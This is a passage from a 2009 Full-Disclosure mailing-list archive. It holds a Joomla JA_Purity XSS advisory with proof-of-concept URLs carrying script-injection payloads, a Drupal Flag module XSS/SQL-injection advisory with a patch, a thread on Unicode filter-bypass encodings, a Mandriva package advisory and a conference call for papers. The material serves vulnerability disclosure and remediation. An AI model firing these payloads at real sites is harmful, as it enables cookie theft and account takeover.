persistent setting it in a cookie: 4 define ('JA_TOOL_FONT', 'ja_font'); ... 27 function getUserSetting(){ 28 $exp = time() + 60*60*24*355; 29 if (isset($_COOKIE[$this->template.'_tpl']) && $_COOKIE[$this->template.'_tpl'] == $this->template){ 30 foreach($this->_params_cookie as $k=>$v) { 31 $kc = $this->template."_".$k; 32 if (isset($_GET[$k])){ 33 $v = $_GET[$k]; 34 setcookie ($kc, $v, $exp, '/'); 35 }else{ 36 if (isset($_COOKIE[$kc])){ 37 $v = $_COOKIE[$kc]; 38 } 39 } 40 $this->setParam($k, $v); 41 } 42 43 }else{ 44 setcookie ($this->template.'_tpl', $this->template, $exp, '/'); 45 } 46 return $this; 47 } 48 49 function getParam ($param, $default='') { 50 if (isset($this->_params_cookie[$param])) { 51 return $this->_params_cookie[$param]; 52 } 53 return $this->_tpl->params->get($param, $default); 54 } 55 56 function setParam ($param, $value) { 57 $this->_params_cookie[$param] = $value; 58 } File 'template/ja_purity/index.php' reads data with getParam and write it directly: 57 getParam('theme_header') && $tmpTools->getParam('theme_header')!='-1') : ?> 58 59 60 getParam('theme_background') && $tmpTools->getParam('theme_background')!='-1') : ?> 61 62 63 getParam('theme_elements') && $tmpTools->getParam('theme_elements')!='-1') : ?> 64 65 99: 118 if ($tmpTools->getParam('logoType')=='image'): ?> 119

120 121

122 getParam('logoText'))=='') ? $config->sitename : $tmpTools->getParam('logoText'); 124 $sloganText = (trim($tmpTools->getParam('sloganText'))=='') ? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText'); ?> 125

126 127

128

129 These are all the variables of JA_Purity template, most of them are vulnerable: logoType logoText sloganText ja_font ja_screen ja_screen_width theme_header theme_background theme_elements horNav horNavType rightCollapsible rightCollapseDefault excludeModules showComponent IV. PROOF OF CONCEPT ------------------------- http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27 http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27 http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E V. BUSINESS IMPACT ------------------------- An attacker can exploit the vulnerability to store persistent XSS. This may lead in steal the targeted user cookies and gain access to the user account. VI. SYSTEMS AFFECTED ------------------------- Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0 VII. SOLUTION ------------------------- Upgrade to version 1.5.11. All inputs should be sanitized at setParam/getParam function, in the same way is done in libraries/joomla/environment/request.php:140 with $var = JRequest::_cleanVar($input[$name], $mask, $type); VIII. REFERENCES ------------------------- http://www.joomla.org http://www.joomlart.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- April 5, 2009: Initial release. June 5, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- April 5, 2009: Discovered by Internet Security Auditors. April 6, 2009: Vendor contacted. They will study the advisory. May-June, 2009: No responses to queries about patching schedule. June 3, 2009: Security Release 1.5.11 published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. From deepsec at deepsec.net Fri Jun 5 15:20:35 2009 From: deepsec at deepsec.net (DeepSec Conference) Date: Fri, 5 Jun 2009 16:20:35 +0200 (CEST) Subject: [Full-disclosure] Reminder: DeepSec 2009 Call for Papers is open Message-ID: <20090605142035.92903D00077E@majere.luchs.at> == REMINDER: === DeepSec In-Depth Security Conference 2009 - Triple Sec ==== Call for Papers and Experts The DeepSec organisation reminds everyone of the Call for Papers for the next conference in November 2009. The deadline for submissions is July 15 2009. == Topics == The focus of DeepSec will be on subtle dangers, stealthy exploits and things you don't see (and possibly don't hear or smell, too). If you got something to talk about that doesn't look like a security problem at the first glance, tell us about it. We'd like to hear about underestimated security issues that may be turned into major headaches for computer systems, networks and users alike. Especially anything that subverts harmless technology and turns it into an attack tool is welcome. Send us stories about single bits that can change our destiny. Failing that we welcome less sneaky approaches, too. - AJAX/Web2.0/JavaScript Security - Cloud Computing - Code Analysis - Cryptographical Weaknesses - Digital Espionage - Digital Forensics - eVoting - Failure and Fixes of all kinds - Incident Response - Malware Research - Messaging Technologies - Network Protocols - Operating Systems - Secure Software Development - Security Management - Social Engineering - Virtualisation - VoIP Technology - Web Security - Wireless Technology Please note, that we are a non-product, non-vendor biased security conference and do not welcome vendor pitches in the conference talks or trainings. We will provide an opportunity for vendor self presentation through sponsorship and vendor booths in the conference lounge, where coffee and snacks will be served during the breaks. == Hacker Lounge == If you don't wish to present a talk or conduct a workshop, you can still try to participate. We are looking for hackers who want to show us their gadgets and methods to break (or fix) networks and security systems. You got something that has lots of blinkenlights, stealth or ideas that go well with security topics, we want to hear about it. Submit it on the CfP web page and get a place in the foyer to show off. == Submission == Proposals for talks and trainings at the second annual DeepSec In-Depth Security Conference will be accepted until _July 15th 2009, 23:59 CEST_. All proposals should be submitted through our web site https://deepsec.net/cfp/ or by email to: cfp at deepsec.net == About DeepSec == DeepSec IDSC is an annual European two-day in-depth conference on computer, network, and application security. It takes place in November and aims to bring together the world's leading security professionals from academics, government, industry, business, and the underground hacking community. The conference offers two days of security talks and two days of trainings, covering the latest topics in network and IT security. DeepSec offers a neutral ground to exchange ideas and experiences, thus making it a unique event where all participants can get in contact freely. == Speakers/Trainers == Speaker privileges include: - One economy class return-ticket to Vienna. - 3 nights of accommodation in the conference hotel. - Breakfast, lunch, and two coffee breaks - Speaker activities during, before, and after the conference. - Speaker's Dinner. - Speaker After-Party in the Metalab Hackerspace. Instructor privileges include: - 50% of the net profit of the class. - 2 nights of accommodation in the conference hotel during the trainings. - Breakfast, lunch, and two coffee breaks. - Free ticket for the conference. - Speaker activities during, before, and after the conference. - Speaker After-Party in the Metalab Hackerspace. If you have questions, want to send us additional material, or have problems with the web form, feel free to contact us at: cfp at deepsec.net Best regards, DeepSec In-Depth Security Conference organisation team. https://deepsec.net/contact/ == Partners == SEaCURE.IT Conference - http://www.seacure.it/ From justin at madirish.net Fri Jun 5 19:10:33 2009 From: justin at madirish.net (Justin Klein Keane) Date: Fri, 05 Jun 2009 14:10:33 -0400 Subject: [Full-disclosure] Drupal Flag Module Multiple Vulnerabilities Message-ID: <4A295F99.8000700@madirish.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability Summary Report Date of Contact: June 5, 2009 13:30 GMT -0400 Author: Justin C. Klein Keane Vendor Response: See below Details of this vulnerability are also posted at the public URL http://lampsecurity.org/drupal-flag-module-vulnerabilities Description of Vulnerability: - - - ----------------------------- Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL that provides extensibility through various third party modules. The Flag module (http://drupal.org/project/flag) "is a flexible flagging system that is completely customizable by the administrator. Using this module, the site administrator can provide any number of flags for nodes, comments, or users. Some possibilities include bookmarks, marking important, friends, or flag as offensive. With extensive views integration, you can create custom lists of popular content or keep tabs on important content." The Flag module contains several cross site scripting vulnerabilities because it does not properly sanitize output of role names before display. The Flag module also contains cross site scripting vulnerabilities because it fails to properly sanitize content type names. Additionally the Flag module contains a SQL injection vulnerability because it does not properly sanitize variables before concatenating them into a SQL query. Systems affected: - - - ----------------- Drupal 6.12 with Flag 6.x-1.1 was tested and shown to be vulnerable. Impact: - - - ------- XSS vulnerabilities may expose site administrative accounts to compromise which could lead to web server process compromise. SQL injection attack can manipulate the Drupal database, compromising data, exposing credentials, and could allow injection of XSS attacks in node content. Mitigating factors: - - - ------------------- The Flag module must be installed. To carry out an role name XSS exploit against the Flag module the attacker must be able to inject malicious content into role names, which is possible for authenticated users with the 'administer permissions' permission. To carry out the content type XSS exploit against the Flag module the attacker must be able to inject malicious content into content type names, which is possible for authenticated users with the 'administer content types' permission. The SQL injection vulnerability has not yet been shown to be exploitable. Technical details: - - ------------------------ The Flag module uses the Drupal user_roles() function from user.module, which fails to sanitize role names before returning them (this is a known issue in Drupal 6.12 - http://lampsecurity.org/drupal-role-xss-vulnerability). On line 416 of flag.module the $roles variable is composed without sanitizing the return value of the user_roles() function. This leads to arbitrary HTML injection. The Flag module also fails to sanitize content type names returned by the node_get_types() function in flag.module on line 708. The variables used to construct $result on line 40 of includes/flag_handler_argument_content_id.inc are not sanitized and could be used to perform SQL injection. Patch - - ------- Applying the following patch mitigates these threats. diff -upr flag/flag.inc flag_fixed/flag.inc - - --- flag/flag.inc 2009-03-14 02:13:54.000000000 -0400 +++ flag_fixed/flag.inc 2009-06-05 13:10:33.000000000 -0400 @@ -227,6 +227,7 @@ class flag_flag { } // But checkboxes need some massaging: $this->roles = array_values(array_filter($this->roles)); + foreach ($this->roles as $key=>$val) {$this->roles[$key] = check_plain($val);} $this->types = array_values(array_filter($this->types)); // Clear internal titles cache: $this->get_title(NULL, TRUE); diff -upr flag/flag.module flag_fixed/flag.module - - --- flag/flag.module 2009-03-14 02:13:54.000000000 -0400 +++ flag_fixed/flag.module 2009-06-05 13:02:55.000000000 -0400 @@ -413,6 +413,7 @@ function theme_flag_admin_page($flags, $ )); $roles = array_flip(array_intersect(array_flip(user_roles()), $flag->roles)); + foreach ($roles as $key=>$val) {$roles[$key] = check_plain($val);} $rows[] = array( $flag->name, $flag->content_type, @@ -440,6 +441,7 @@ function theme_flag_admin_page($flags, $ )); $roles = array_flip(array_intersect(array_flip(user_roles()), $flag->roles)); + foreach ($roles as $key=>$val) {$roles[$key] = check_plain($val);} $rows[] = array( $flag->name, $flag->module, @@ -685,11 +687,12 @@ function flag_form(&$form_state, $name, '#weight' => 1, '#access' => empty($flag->locked['global']), ); - - - + $roles = user_roles(TRUE); + foreach ($roles as $key=>$val) $roles[$key]=check_plain($val); $form['roles'] = array( '#type' => 'checkboxes', '#title' => t('Roles that may use this flag'), - - - '#options' => user_roles(TRUE), + '#options' => $roles, '#default_value' => $flag->roles, '#required' => TRUE, '#description' => t('Checking authenticated user will allow all logged-in users to flag content with this flag. Anonymous users may not flag content.'), @@ -702,10 +705,12 @@ function flag_form(&$form_state, $name, $form['roles']['#value'] = $flag->roles; } + $types = node_get_types('names'); + foreach ($types as $key=>$val) $types[$key] = check_plain($val); $form['types'] = array( '#type' => 'checkboxes', '#title' => t('What nodes this flag may be used on'), - - - '#options' => node_get_types('names'), + '#options' => $types, '#default_value' => $flag->types, '#description' => t('Check any node types that this flag may be used on. You must check at least one node type.'), '#required' => TRUE, diff -upr flag/includes/flag_handler_argument_content_id.inc flag_fixed/includes/flag_handler_argument_content_id.inc - - --- flag/includes/flag_handler_argument_content_id.inc 2008-12-03 09:10:00.000000000 -0500 +++ flag_fixed/includes/flag_handler_argument_content_id.inc 2009-06-05 13:06:28.000000000 -0400 @@ -34,7 +34,7 @@ class flag_handler_argument_content_id e $titles = array(); $placeholders = implode(', ', array_fill(0, sizeof($this->value), '%d')); - - - $result = db_query("SELECT o.". $views_info['title field'] ." FROM {". $views_info['views table'] ."} o WHERE o.". $views_info['join field'] ." IN ($placeholders)", $this->value); + $result = db_query("SELECT o.%s FROM {%s} o WHERE o.%s IN ($placeholders)", $views_info['title field'], $views_info['views table'], $views_info['join field'], $this->value); while ($title = db_fetch_object($result)) { $titles[] = check_plain($title->$views_info['title field']); } Vendor Response - --------------- The vendor classifies these vulnerabilities as bugs and has reported them to the module maintainer for a fix. Ref: http://drupal.org/node/483218 - -- Justin C. Klein Keane http://www.MadIrish.net http://www.LAMPSecurity.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iPwEAQECAAYFAkopX5kACgkQkSlsbLsN1gBVfQb8C6uxf8DKl/QBagr+5lTo7gsi UpNNUmcaoaYD4IDoUthEIUga+yqzXa3xEkp/fPkvLprh3CWsQ/+GrZrtZWBebXlM GX2+C1SJHh9bPJ6VmqqOCvOTrtmr7db04Eo1X2cWkAONyO4f7G7dAe1WaYX8+otj iR3zvEgzwT6rE/4z9wJistlIeLff7AN6aGn2BIxl0BhGQ1JsqJKzQW27tRU7pj+w D3hIK7EnV5Cz6/ofzj/X/BW5Oq2cUrH/tKD6HYqDvloJ5rjmm7fR71afAAG80mjr +aaHevngJPUzCIR4/mM= =cNdU -----END PGP SIGNATURE----- From chris at casabasec.com Fri Jun 5 17:34:34 2009 From: chris at casabasec.com (Chris Weber) Date: Fri, 05 Jun 2009 09:34:34 -0700 Subject: [Full-disclosure] [WEB SECURITY] Re[2]: [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <1962868651.20090605104235@Zoller.lu> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> <1962868651.20090605104235@Zoller.lu> Message-ID: <000001c9e5fb$82a95fe0$87fc1fa0$@com> Sorta, kinda, not really. From the outside looking in, the inputs can help us understand what's happening under the covers: 1. Some Java, .Net, ICU API is performing string Normalization 2. Some API or data handoff (e.g. from IIS front-end to Oracle db) is performing an (otherwise unintended) best-fit mapping 3. Some developer chose to do transform strings in a custom way White Hat's in a good position to go to these customers, ask them if they can peek at the code, and gather information about which frameworks API's they were using, and how they were calling them. That's what I'd do with this information. Although, we already know how most of the major frameworks behave. Chris -----Original Message----- From: Thierry Zoller [mailto:Thierry at Zoller.lu] Sent: Friday, June 05, 2009 1:43 AM To: Arian J. Evans Cc: Prasad Shenoy; Full-Disclosure; 3APA3A; websecurity at webappsec.org Subject: [WEB SECURITY] Re[2]: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? Hi, AJE> We have seen 44 sites in the last year at WhiteHat Security that were AJE> vulnerable to Fullwidth unicode-encoded attacks. This one tends to be AJE> more ubiquitous than others when you find it. In the applications weak AJE> to this -- we found roughly 200 locations vulnerable to attack in AJE> those 44 applications, and each location would have multiple inputs, AJE> so you are probably talking 1,000+ inputs vulnerable to attack using AJE> this encoding. The discussion of how many inputs are vulnerable is kind of ludicrous isn't it? As it nearly always boils down to the same set of impacts even if you have a trillion of inputs vulnerable, per domain. ---------------------------------------------------------------------------- Join us on IRC: irc.freenode.net #webappsec Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/ Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed] Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA From security at mandriva.com Fri Jun 5 21:45:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 05 Jun 2009 22:45:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:130 ] gstreamer0.10-plugins-good Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:130 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gstreamer0.10-plugins-good Date : June 5, 2009 Affected: 2008.1, 2009.0, 2009.1 _______________________________________________________________________ Problem Description: Multiple integer overflows in the (1) user_info_callback, (2) user_endrow_callback, and (3) gst_pngdec_task functions (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka gst-plugins-good or gstreamer-plugins-good) 0.10.15 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted PNG file, which triggers a buffer overflow (CVE-2009-1932). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1932 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 32b4c3a6282627f92f51a7d2d46ff77e 2008.1/i586/gstreamer0.10-aalib-0.10.7-3.3mdv2008.1.i586.rpm c795af9934302427b9eff941f8202a21 2008.1/i586/gstreamer0.10-caca-0.10.7-3.3mdv2008.1.i586.rpm 2f6ee0c43cceb1b6a45c397230b2007d 2008.1/i586/gstreamer0.10-dv-0.10.7-3.3mdv2008.1.i586.rpm 66e9ffff70400e28a06b9acad18e9460 2008.1/i586/gstreamer0.10-esound-0.10.7-3.3mdv2008.1.i586.rpm 7f519c98463940c13d950f2c19bc91b3 2008.1/i586/gstreamer0.10-flac-0.10.7-3.3mdv2008.1.i586.rpm 88d2eec0febfa0fe536d43fcc0f06281 2008.1/i586/gstreamer0.10-plugins-good-0.10.7-3.3mdv2008.1.i586.rpm e642a9932760431f65d6e2ec91aebe2f 2008.1/i586/gstreamer0.10-raw1394-0.10.7-3.3mdv2008.1.i586.rpm 16d3b8e3d5f5e79dbf975b7755d481d6 2008.1/i586/gstreamer0.10-speex-0.10.7-3.3mdv2008.1.i586.rpm a35c2dacfc21179a7ce1ad2ddbde58b5 2008.1/i586/gstreamer0.10-wavpack-0.10.7-3.3mdv2008.1.i586.rpm 7f89efbf201445b95c6d1f8e48cdbcf5 2008.1/SRPMS/gstreamer0.10-plugins-good-0.10.7-3.3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 47251e20c751b5cac7c878577fd32cbb 2008.1/x86_64/gstreamer0.10-aalib-0.10.7-3.3mdv2008.1.x86_64.rpm 41ad7308ecfdd545d1eeb625f9be26f0 2008.1/x86_64/gstreamer0.10-caca-0.10.7-3.3mdv2008.1.x86_64.rpm c38747918e25383cf266575007b70bbc 2008.1/x86_64/gstreamer0.10-dv-0.10.7-3.3mdv2008.1.x86_64.rpm 3b43f5f0c6d7472bdd2d3a230ec4a5aa 2008.1/x86_64/gstreamer0.10-esound-0.10.7-3.3mdv2008.1.x86_64.rpm e5eb3c018bfaf8db6f98787f919e7213 2008.1/x86_64/gstreamer0.10-flac-0.10.7-3.3mdv2008.1.x86_64.rpm faf028bd1201249fef3b051451ee0a67 2008.1/x86_64/gstreamer0.10-plugins-good-0.10.7-3.3mdv2008.1.x86_64.rpm 21dadd252d853fba7fc0c711c8afd00f 2008.1/x86_64/gstreamer0.10-raw1394-0.10.7-3.3mdv2008.1.x86_64.rpm 874657a9c5ae3d65a010c887462cf832 2008.1/x86_64/gstreamer0.10-speex-0.10.7-3.3mdv2008.1.x86_64.rpm decd0fa087bdec088152dd61974d71b1 2008.1/x86_64/gstreamer0.10-wavpack-0.10.7-3.3mdv2008.1.x86_64.rpm 7f89efbf201445b95c6d1f8e48cdbcf5 2008.1/SRPMS/gstreamer0.10-plugins-good-0.10.7-3.3mdv2008.1.src.rpm Mandriva Linux 2009.0: de338a01c224c0b9231d8f0e3434d653 2009.0/i586/gstreamer0.10-aalib-0.10.10-2.2mdv2009.0.i586.rpm a96a976b99688e00563e2e239f061576 2009.0/i586/gstreamer0.10-caca-0.10.10-2.2mdv2009.0.i586.rpm 3864fd359d74953b036a1bdf2a442bbe 2009.0/i586/gstreamer0.10-dv-0.10.10-2.2mdv2009.0.i586.rpm 9bc82a78ece0447e05a6538cc307b3cc 2009.0/i586/gstreamer0.10-esound-0.10.10-2.2mdv2009.0.i586.rpm 40de2ef276852777418f79f97de4015d 2009.0/i586/gstreamer0.10-flac-0.10.10-2.2mdv2009.0.i586.rpm e1e9be54e2de0341f427542370453873 2009.0/i586/gstreamer0.10-plugins-good-0.10.10-2.2mdv2009.0.i586.rpm 5e81527fee1fbe434934160101bad731 2009.0/i586/gstreamer0.10-pulse-0.10.10-2.2mdv2009.0.i586.rpm 4bb8e5964cdf388f30125e1799c041d9 2009.0/i586/gstreamer0.10-raw1394-0.10.10-2.2mdv2009.0.i586.rpm 5e8ecd8f2cd60980a9d1777af765ccb2 2009.0/i586/gstreamer0.10-soup-0.10.10-2.2mdv2009.0.i586.rpm 92926886890bb3c129d1358699369e07 2009.0/i586/gstreamer0.10-speex-0.10.10-2.2mdv2009.0.i586.rpm e0af5cebef95297da35dbe644d5bd07e 2009.0/i586/gstreamer0.10-wavpack-0.10.10-2.2mdv2009.0.i586.rpm b52464a5db2a376c7ffe9b4ae0d73cba 2009.0/SRPMS/gstreamer0.10-plugins-good-0.10.10-2.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b5caab29e29b756fefbb4c74e383ec00 2009.0/x86_64/gstreamer0.10-aalib-0.10.10-2.2mdv2009.0.x86_64.rpm e1ee1041b7ac2c2a10b5f3fb25b1cdd3 2009.0/x86_64/gstreamer0.10-caca-0.10.10-2.2mdv2009.0.x86_64.rpm aa5a02a2a2b1a83738360fe55df21df4 2009.0/x86_64/gstreamer0.10-dv-0.10.10-2.2mdv2009.0.x86_64.rpm dead047079a5b1a9052dfbe61b6fe5a9 2009.0/x86_64/gstreamer0.10-esound-0.10.10-2.2mdv2009.0.x86_64.rpm 1675f35f059b1c99228ae1aa125cfaac 2009.0/x86_64/gstreamer0.10-flac-0.10.10-2.2mdv2009.0.x86_64.rpm 4584962d9870e9813b128ada5469defc 2009.0/x86_64/gstreamer0.10-plugins-good-0.10.10-2.2mdv2009.0.x86_64.rpm bf54135323d93696ee68154df93ebbde 2009.0/x86_64/gstreamer0.10-pulse-0.10.10-2.2mdv2009.0.x86_64.rpm 231e93b49075748873a361e38848f43c 2009.0/x86_64/gstreamer0.10-raw1394-0.10.10-2.2mdv2009.0.x86_64.rpm 4a8863274976927a121bee25dd421523 2009.0/x86_64/gstreamer0.10-soup-0.10.10-2.2mdv2009.0.x86_64.rpm 35030eeae145d26f41d0efa2c46efcff 2009.0/x86_64/gstreamer0.10-speex-0.10.10-2.2mdv2009.0.x86_64.rpm 11ecdd00ae934f05702c771946611333 2009.0/x86_64/gstreamer0.10-wavpack-0.10.10-2.2mdv2009.0.x86_64.rpm b52464a5db2a376c7ffe9b4ae0d73cba 2009.0/SRPMS/gstreamer0.10-plugins-good-0.10.10-2.2mdv2009.0.src.rpm Mandriva Linux 2009.1: 576d67df2c10fd5ce98fafbcccf5d31f 2009.1/i586/gstreamer0.10-aalib-0.10.14-1.1mdv2009.1.i586.rpm c1df9fa818ac12667db9bfd51a8801df 2009.1/i586/gstreamer0.10-caca-0.10.14-1.1mdv2009.1.i586.rpm 1b2cbe0c1bd991db15f8a4ff30720430 2009.1/i586/gstreamer0.10-dv-0.10.14-1.1mdv2009.1.i586.rpm ae7c7483df3feb7ea984e32241bdba1f 2009.1/i586/gstreamer0.10-esound-0.10.14-1.1mdv2009.1.i586.rpm d881a0c3b7943dcde1e1ce2b12f55980 2009.1/i586/gstreamer0.10-flac-0.10.14-1.1mdv2009.1.i586.rpm 48b03dd5ff1f72383af81056a157d4d4 2009.1/i586/gstreamer0.10-plugins-good-0.10.14-1.1mdv2009.1.i586.rpm c72a5910e0c83f2e5b29db46f1a070d5 2009.1/i586/gstreamer0.10-pulse-0.10.14-1.1mdv2009.1.i586.rpm 2ec1d77cbee188562138681c274497d1 2009.1/i586/gstreamer0.10-raw1394-0.10.14-1.1mdv2009.1.i586.rpm d167d2ce3cabc24af442ad53736a4ae4 2009.1/i586/gstreamer0.10-soup-0.10.14-1.1mdv2009.1.i586.rpm 7e533c55706311d1abb8c1cf81febad7 2009.1/i586/gstreamer0.10-speex-0.10.14-1.1mdv2009.1.i586.rpm 442b714ff0d64c572c3f63a2b71cf39d 2009.1/i586/gstreamer0.10-wavpack-0.10.14-1.1mdv2009.1.i586.rpm 0e0ec096f0960620be981e5d7b4bc216 2009.1/SRPMS/gstreamer0.10-plugins-good-0.10.14-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 252223161131b2287b9e7432b5152c08 2009.1/x86_64/gstreamer0.10-aalib-0.10.14-1.1mdv2009.1.x86_64.rpm a9fc8b915bf67dfc270c8ac403269a89 2009.1/x86_64/gstreamer0.10-caca-0.10.14-1.1mdv2009.1.x86_64.rpm 162a54cf36ce97f95aa06b36d3ea40df 2009.1/x86_64/gstreamer0.10-dv-0.10.14-1.1mdv2009.1.x86_64.rpm 88e60113882df2d775d458f88f035243 2009.1/x86_64/gstreamer0.10-esound-0.10.14-1.1mdv2009.1.x86_64.rpm 23263adc4119918c8e130866a02243fa 2009.1/x86_64/gstreamer0.10-flac-0.10.14-1.1mdv2009.1.x86_64.rpm 63a6e950690392c3d8a7da89eeb23b1c 2009.1/x86_64/gstreamer0.10-plugins-good-0.10.14-1.1mdv2009.1.x86_64.rpm d900bf012fbac7b6ed4cd019b1dc41b3 2009.1/x86_64/gstreamer0.10-pulse-0.10.14-1.1mdv2009.1.x86_64.rpm c9610f9bdab919fd6989bb00278fd83d 2009.1/x86_64/gstreamer0.10-raw1394-0.10.14-1.1mdv2009.1.x86_64.rpm f8764ecd3d4ddb75ac4fb0fa6dae0ab9 2009.1/x86_64/gstreamer0.10-soup-0.10.14-1.1mdv2009.1.x86_64.rpm 9dd619ff1da567ebc0cddd82b085bd87 2009.1/x86_64/gstreamer0.10-speex-0.10.14-1.1mdv2009.1.x86_64.rpm 070d6303a673cb624866ab61f4dff728 2009.1/x86_64/gstreamer0.10-wavpack-0.10.14-1.1mdv2009.1.x86_64.rpm 0e0ec096f0960620be981e5d7b4bc216 2009.1/SRPMS/gstreamer0.10-plugins-good-0.10.14-1.1mdv2009.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKKVdrmqjQ0CJFipgRAvTdAJ9M4Mgl3lDDDlnwUwb5kR7dpOhp/QCgqQGH IiI+kqUb/EO99yc0N9eKqwM= =YXTZ -----END PGP SIGNATURE----- From arian.evans at anachronic.com Sat Jun 6 00:30:30 2009 From: arian.evans at anachronic.com (Arian J. Evans) Date: Fri, 5 Jun 2009 16:30:30 -0700 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <8BEEB32F-3406-485F-B05B-1573DC522FF4@twisteddelight.org> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <8BEEB32F-3406-485F-B05B-1573DC522FF4@twisteddelight.org> Message-ID: response inline On Thu, Jun 4, 2009 at 11:23 PM, Stephen de Vries wrote: > > Hi Arian, >> http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html > > Was there a common library or framework in all the vulnerable sites that was > responsible for this? Excellent question. Chris's response covers part of this, but I will add below where I disagree with his 99% excellent response. Long and short: Yes I think so, though Blind Black Box testing only informs you is that the culprit is guilty, not *who* the culprit is. :) There are three classes of these issues, and they all occur for different reasons. Chris already excellently addressed this, ironically using three categories as well, though I label them a bit differently: 1. Valid but Alternate Encodings that are normalized 2. Literal Transcodings that occur to avoid one issue (security, false-familiar, name-collision, etc.) while creating a new vulnerability 3. Interpreters Bugs that were truly unintended --- 1. Valid Alternate Unicode Encodings that are Normalized: Some of these issues, like Fullwidth encoding, use valid and legitimate Unicode representations that the software normalizes to a canonical form. However uncommon and unexpected the encoding may be -- when you find these they tend to be broadly spread in an application, and my speculation is that they are the result of a framework or near-universally used library. These are the most common issues. (though not in the dataset I reported yesterday.) They tend to be "vendor" or "open source framework" issues. 2. Transliteral transcodings (a=A because they look the same) including: + in Unicode terms "whole & mixed-script confusables" + in language terms "false-familiars" + as Chris described "best-fit mappings". All names == the same. Which, incidentally, is the problem. :) These are usually found in one specific location, usually specific to a function or set of functions in an application, from what I see. My further speculation is that they are the result of a specific library (or emergent behavior due to a specific combination of libraries) to facilitate a specific function in that location. Chris addressed most of the "why" in his response, and I agree most of what Chris said. These are, to a degree, Unicode problems insomuch as I think their recommendations cause some of them. To solve the "confusables" and "false-familiars" problems that are leveraged for multiple types of fraudulent and criminal activity (phishing, luring, fraud and stalking on social networks) Unicode recommended a set of practices to minimize or avoid name-collisions for Security's Sake: Unicode Security Considerations http://unicode.org/reports/tr36/ Unicode Security Mechanisms http://unicode.org/reports/tr39/ These security recommendations lead to another set of security issues: the increase in available characters that can be used to launch any given type of syntax attack. These are the next most-common issues we see of the 3 types. These happen for a variety of reasons: sometimes custom coding, and increasingly in Europe we see libraries and functions baked into frameworks and packages to do these types of things, sometimes transparently to the end-developer using the framework. 3. Bizarre Behavior By Interpreters: And some are simply the result of interpreter bugs/unfathomable behavior. None of the examples I have given so far are ones that I put in the #3 category. Yosuke Hasegawa linked in Jeremiah's blog post on this gives some really good examples of what I mean here. Namely -- sometimes interpreters (browsers like IE) do really weird or unsafe things for no clear good reason. I spend very little time researching these as my focus is on web software and not compiled code interpreters, so I/we/WhiteHat tend to only find these through accident. There is a fuzzy line here as some interpreter bugs allow you to exploit an application with #3, but it's not my specialty. At WhiteHat we have been heavily researching #1 and #2 and actually have a wealth of exploit data to share. The problem was bigger than we thought so have continued to expand the scope and range of our testing in these areas, which sometimes allow you to stumble upon a #3 issue. These are all simply my speculations...to be clear. I do not feign expertise on this subject like I do when it comes to motorcycles, mistresses, and martinis. --- Arian Evans From arian.evans at anachronic.com Sat Jun 6 00:42:57 2009 From: arian.evans at anachronic.com (Arian J. Evans) Date: Fri, 5 Jun 2009 16:42:57 -0700 Subject: [Full-disclosure] 